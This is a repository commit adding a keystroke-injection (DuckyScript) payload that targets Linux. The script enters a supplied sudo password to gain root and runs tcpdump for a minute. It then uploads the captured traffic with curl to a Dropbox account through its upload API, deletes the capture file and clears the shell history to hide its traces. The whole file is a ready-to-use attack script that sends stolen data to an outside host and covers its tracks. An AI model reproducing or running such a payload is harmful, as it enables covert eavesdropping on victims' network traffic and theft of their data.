Create payload.txt
Aleff
GitHub
parent
944d8f7e2a
commit
85ea863505
|
|
@ -0,0 +1,119 @@
|
|||
|
||||
REM #############################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Network Traffic |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM #############################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Permissions
|
||||
REM - Internet Connection
|
||||
|
||||
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
||||
DEFINE SUDO_PASS example
|
||||
REM REQUIRED: Set what you want to sniff, for example tcp port 80
|
||||
DEFINE SNIFFING example
|
||||
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
|
||||
DEFINE TOKEN example
|
||||
REM Just a Dropbox const
|
||||
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||
REM Output file path packets.pcap, remember to use pcap extension
|
||||
DEFINE FILE example.pcap
|
||||
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### PERMISSIONS SECTION ####
|
||||
|
||||
|
||||
STRING sudo su
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING SUDO_PASS
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
|
||||
REM #### Network Traffic SECTION ####
|
||||
|
||||
|
||||
STRING FILE_PATH="
|
||||
STRING FILE
|
||||
STRING "
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
STRING filter_expression="
|
||||
STRING SNIFFING
|
||||
STRING "
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Network card name
|
||||
STRING net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Network dump
|
||||
STRING tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Get PID
|
||||
STRING tcpdump_pid=$!
|
||||
ENTER
|
||||
|
||||
REM Set how long you want to sniff
|
||||
DELAY 60000
|
||||
|
||||
REM Kill the process by PID
|
||||
STRING kill $tcpdump_pid
|
||||
ENTER
|
||||
|
||||
|
||||
REM #### Exfiltrate SECTION ####
|
||||
REM You can use whatever you want, i use Dropbox
|
||||
|
||||
STRING ACCESS_TOKEN="
|
||||
STRING TOKEN
|
||||
STRING "
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
STRING DROPBOX_FOLDER="/Exfiltration"
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
STRING curl -X POST
|
||||
STRING DROPBOX_API_CONST
|
||||
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
|
||||
ENTER
|
||||
|
||||
|
||||
|
||||
REM #### REMOVE TRACES ####
|
||||
|
||||
|
||||
STRING rm "$FILE_PATH"
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
STRING history -c
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Exit from Sudo user
|
||||
STRING exit
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Close the shell
|
||||
STRING exit
|
||||
ENTER
|
||||
Loading…
Reference in New Issue